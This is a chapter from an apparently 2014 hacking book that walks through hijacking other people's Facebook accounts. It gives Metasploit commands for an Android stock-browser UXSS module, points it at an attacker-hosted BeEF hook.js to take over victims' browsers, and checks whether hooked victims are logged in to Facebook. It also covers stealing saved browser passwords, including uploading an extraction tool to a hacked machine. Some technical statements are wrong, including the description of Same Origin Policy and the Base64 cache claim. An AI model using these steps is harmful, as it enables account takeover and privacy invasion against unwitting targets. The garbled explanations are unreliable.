Hacking by Solis Tech: How to Hack Computers, Basic Security and Penetration Testing (2014)
Chapter 20: Hacking Facebook
Facebook is probably one of the most secure sites that exist today, which makes it an ideal place on the web to share information about yourself, or anything that is on your mind. However, Facebook can also be a place where the most sensitive information are stored (thanks to chat boxes), and a hacked Facebook page may also mean the fall of a brand or the reputation of its corporate users. If you are working as part of your company’s information technology security team, Facebook may be one of the main things that you must protect in order to ensure that your job stays afloat!
Can You Really Hack Facebook?
Facebook itself has deep encryption when it comes to passwords – there is no way that you can know what your password is in any case you forget it, because Facebook only has a protocol of letting you know that your password is right, but it offers no means of letting you see it.
What does this mean? Facebook offers you two options when it comes to entering a password for a specific account:
1. You would have to enter it yourself and then let your device store that information so that you can enter your account without having to enter your username and password again
2. You would have to reset your password in any case you forgot it and you would need to sign in from another device
However, this does not mean that hackers really are in a total dead end when it comes to knowing a Facebook password. In this chapter, you will know some of the known ways of hacking a Facebook account by exploiting the vulnerabilities of devices and applications that have access to it.
Using the Android’s Stock Browser Flaw
Google has been aware of the stock Android browser’s security flaw and have made the necessary patches. However, the browser isn’t automatically patched in most Android systems nowadays. Because of this, the following hack would work on most Android devices.
The term Same Origin Policy (SOP) is one of the many important security measures that browsers need to have. This policy means that browsers should be designed in such a way that webpages have means to load any code that is not integrated in their own resource. By having this policy, website owners would have the peace of mind that no criminal hacker would be able to inject codes without having to secure their authorization first.
Unfortunately, the Android browser that comes installed by default does not enforce this security policy adequately. Because of this, it is possible for a hacker to get his hands on all pages that are open using this browser. It also means that once an Android user uses this browser to go to a trap website which would inject a code, it would always be possible to access all the sites that are opened in this default browser. This method, as you have already read in the previous chapter, is called phishing.
How to Phish for Facebook Details
In order to create a phishing trap, you would need to install the software called Kali Linux. Within this system, you would find two tools, BeEF and Metasploit, which are both necessary in creating a phishing scam. Follow the steps to start hacking:
1. Pull up Metasploit
Fire up Kali Linux and key in the following command:
kali > msfconsole
You would see a screen that says that you are about to set up listeners, landing pages, or emails for phishing. If you want to learn more about Metasploit, you can visit rapid7.com/metasploit.
2. Search for the exploit
Now that Metasploit is running, find the program that you need to exploit. In order to do that, key in the following command:
msf > search platform:android stock browser
You would only get one module for the exploit, which is: auxiliary/gather/android_stock_browser_uxss
Load this module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
3. Display the information that you need to plan your exploit
After loading the module, you would have to find the information that you need on how to exploit the stock browser. To do this, key in:
msf > info
You would read in the description page that the exploit that you are about to use would work against any Android stock browser that has been released before Kitkat 4.4. It would also tell you that by using this module, you would be able to run an arbitrary JavaScript using a URL context.
4. Display the options
You would need to see all the options that you need in order to make the module work. To launch the module, you would need to set the REMOTE_JS.
5. Launch BeEF
Once you fire up this software, you would see a brief tutorial on how to hook a browser. On the Getting Started page, you would see links on how to point a browser to another page, plus other tutorials. Leave the BeEF program running.
6. Set the REMOTE_JS to BeEF Hook
Go back to MetaSploit and set the REMOTE_JS to the webpage hook on BeEF. Make sure that you use the IP of the BeEF that you are running. To do this, use the following command string:
msf > set REMOTE_JS http://(IP address of the BeEF’s server)/hook.js
Now, set the URIPATH to the root directory. Type the string:
msf > set uripath /
7. Fire up the server
Key in the following command:
msf> run
Doing this would allow you to start the Metasploit’s web server and allow you to serve on the BeEF hook that you have set a while ago. After doing so, anyone who navigates to the website would have their entire browser hooked on BeEF.
8. Try to go to a website from the stock android browser
Now, you are going to try to go to a website using the browser that came with the Android device, just like what a target user would do. What would happen is that when they navigate to the webpage that hosts the hook that you have created with the earlier steps, the browser would be automatically injected with a JavaScript from BeEF. For example, if the user connects to the web server that you have used at 192.168.0.1, the BeEF explorer window will show that the browser you are targeting is now under “Hooked Browser”.
9. Check if the browser is authenticated to Facebook
Go back to BeEF and navigate towards the B tab. Go to the Network folder and click on the Detect Social Networks. Clicking on this command will allow the software to see if the target is authenticated to Twitter, Facebook, or Gmail. Click on the Execute button to launch the command.
BeEF would return to you with the results. If the target has not authenticated the browser to Facebook, all you need to do is to wait for the target to connect to Facebook. Once he does, do this command again. Once his Facebook has been authenticated, you can direct a tab to launch the user’s Facebook page!
Make Use of the Cache
Another hack that you can use to pull up another person’s Facebook account makes use of the fact that most people tend to store their passwords on the devices that they are using. Since there is a lot of people that do not want to fill in username and password forms over and over again, there is a big chance that you can find the stored passwords for all accounts of a target user somewhere on his computer. If the target user has the habit of clicking Remember Me on all sites that he visits so that he won’t have to re-authenticate again and again, then it is very likely that you can find all his passwords in one sitting.
At this point, you would need to remember one golden rule in hacking – if you can get physical access to the device that you intend to hack, then it is possible for you to get all the passwords that you need. The key to this is to know where operating systems and browsers would normally store passwords and know how to crack hashed passwords when you spot them. For example, Mozilla browsers are known to store user passwords for Windows users at this path: c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entries
The passwords that you would see here would only be encrypted as Base 64 encoding, which you can manually decode. You can also use a software similar to PassWordViewer to decode this type of encryption with ease.
Use the Elcomsoft’s Password Extraction Tool
Elcomsoft is a known decryption company whose main goal is to create and sell software that are designed to crack different types of password encryption. One of the hacker favorites from this company is the iCloud hack tool that recently revealed nude photos of celebrities that are supposedly locked down on the iCloud server.
Elcomsoft is also the known developer of the Facebook Password Extractor, which exploits the possibility that users have clicked on the Remember Me button to authenticate their profile using a Windows device. To use this tool, you would need to have physical access to the device that your target is using. If that is not possible, you would need to hack into the target system and upload this tool. If that is also not possible to accomplish, you can download the user’s browser password file that are stored in the computer and then use this tool locally. This tool would be able to work on the following:
1. Early Google Chrome editions, up to Chrome 11
2. Microsoft Internet Explorer versions up to IE9
3. Mozilla Firefox editions up to Firefox 4
4. Apple Safari editions up to Safari 5
5. Opera editions, up to Opera 11
Securing Facebook
At this point, you would realize that the workaround against these attacks are fairly simple: since attacks that are aimed to hack your Facebook account would only work if hackers have access to your devices, the first rule to Facebook security is to prevent anyone from having physical access to your devices. It would also be a good idea to start upgrading your web browsers for better encryption policies for your passwords, just in case you would need to part with your devices.
Another great security measure is to keep your passwords safe by avoiding any means of storing them in your devices. That means that you would need to stop the habit of clicking Remember Me on any website that you log into. This way, you would never have to worry about people getting their hands on your social media accounts while your device is away.